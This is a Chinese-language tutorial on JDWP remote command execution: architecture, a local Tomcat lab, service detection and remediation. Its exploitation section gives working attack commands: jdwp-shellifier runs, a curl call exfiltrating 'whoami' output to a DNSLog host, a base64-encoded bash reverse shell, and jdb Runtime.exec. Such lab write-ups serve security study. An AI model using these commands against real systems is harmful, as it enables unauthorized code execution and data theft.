基本概念

JPDA

JPDA(Java Platform Debugger Architecture)即Java平台调试体系架构,其整体架构如图:

整体分为三层:

  • JVMTI:Java VM Tool Interface即JVM工具接口。Debuggee即被调试者是由被调试的应用程序(未显示)、运行应用程序的VM和调试器后端组成。为了可远程调试,JVM实例必须使用命令行参数-Xdebug以及参数-Xrunjdwp(或-agentlib)显式启动。其中调试器后端是使用JVMTI来定义JVM提供的调试服务;
  • JDWP:Java Debug Wire Protocol是Debugger和JVM实例之间的通信协议;
  • JDI:Java Debug Interface即Java调试接口,是JDWP协议的客户端,调试器通过其来远程调试目标JVM中的应用;

JDWP

JDWP(Java Debugger Wire Protocol)即Java调试线协议,是一个为Java调试而设计的通讯交互协议。在JPDA(Java Platform Debugger Architecture)中,它定义了调试器(Debugger)和被调试的JVM(Debuggee)之间的通信协议。

JDWP远程命令执行漏洞

漏洞原理

如果目标Java应用开启了JDWP服务且对外开放,则攻击者可利用JDWP实现远程代码执行。

环境搭建

到官网下载tomcat,这里以tomcat8.5为例,下载地址:https://tomcat.apache.org/download-80.cgi

需要下载源码版:

image-20220727174337523

解压安装tomcat

1
2
3
tar -zxvf apache-tomcat-8.5.81.tar.gz
mkdir /opt/tomcat
mv apache-tomcat-8.5.81 /opt/tomcat/

修改配置文件

1
2
3
4
cd /opt/tomcat/apache-tomcat-8.5.81/bin
vim catalina.sh
//在首行添加:
CATALINA_OPTS="-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000"

连接方式有两种,为dt_shmem和dt_socket,分别表示本机调试和远程调试。address=8000 代表开启8000端口作为远程调试端口。./startup.sh启动tomcat。

服务探测

有三种常用方式来进行JDWP服务探测,原理都是一样的,即向目标端口连接后发送JDWP-Handshake,如果目标服务直接返回一样的内容则说明是JDWP服务。

nmap

使用Nmap扫描:

1
nmap -sT -sV 127.0.0.1 -p 8000

扫描会识别到JDWP服务,且有对应的JDK版本信息:

image-20220728104428315

telnet

使用Telnet命令探测,需要马上输入JDWP-Handshake,然后服务端返回一样的内容,证明是JDWP服务:

image-20220728104348482

脚本

使用如下脚本扫描也可以,直接连接目标服务发送JDWP-Handshake,然后接受到相同内容则说明是JDWP服务:

1
2
3
4
5
6
7
8
9
10
import socket

client = socket.socket()
client.connect(("127.0.0.1", 8000))
client.send(b"JDWP-Handshake")

if client.recv(1024) == b"JDWP-Handshake":
print("[*]JDWP Service!")

client.close()

漏洞利用

jdwp-shellifier

直接用GitHub上已有的工具:https://github.com/IOActive/jdwp-shellifier

该工具通过编写了一个JDI(JDWP客户端),以下断点的方式来获取线程上下文从而调用方法执行命令。

默认break on是在java.net.ServerSocket.accept方法上,

1
python2 jdwp-shellifier.py -t 127.0.0.1 -p 8000 --cmd "touch /tmp/hack.txt"

直接设置断点函数为java.lang.String.indexOf会更快速:

1
python2 jdwp-shellifier.py -t 127.0.0.1 -p 8000 --break-on "java.lang.String.indexOf" --cmd "touch /tmp/hack.txt"

image-20220727175002246

但是前面的命令虽然执行了但是看不到回显,在Linux环境下可以利用DNSLog外带回显:

1
python2 jdwp-shellifier.py -t 127.0.0.1 -p 8000 --break-on "java.lang.String.indexOf" --cmd "curl `whoami`.83031034.dnslog.rest."

image-20220727195905747

反弹shell:

1
2
3
# 不能直接运行/bin/bash -i >& /dev/tcp/127.0.0.1/12345 0>&1来反弹
# 跟Java的exec()反弹一个原理,可用Base64绕过
python2 jdwp-shellifier.py -t 127.0.0.1 -p 8000 --break-on "java.lang.String.indexOf" --cmd "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS8xMjM0NSAwPiYx}|{base64,-d}|{bash,-i}"

image-20220727200245697

msf

在msf中可以使用exploit/multi/misc/java_jdwp_debugger模块进行攻击利用。

原理是去找sleeping中的线程,然后下发单步指令是程序断下来,从而触发命令执行。

jdb

jdb是JDK中自带的命令行调试工具。

这里是按照msf中的方式搞:

  1. attach到远程JDWP服务;
  2. threads命令查看所有线程,查找sleeping的线程;
  3. thread sleeping的线程id,然后stepi进入该线程;
  4. 通过print|dump|eval命令,执行Java表达式从而达成命令执行;

这里本地-attach参数连接会出差,换为下面的方式:

1
jdb -connect com.sun.jdi.SocketAttach:hostname=127.0.0.1,port=8000

执行命令:

1
eval java.lang.Runtime.getRuntime().exec("touch /tmp/hack.txt")

该方式可以直接回显。

漏洞修复

  1. 禁用远程Debug功能(关闭JDWP端口)
  2. 限制JDWP端口对外访问,端口号可通过启动java服务命令行参数或配置文件查看。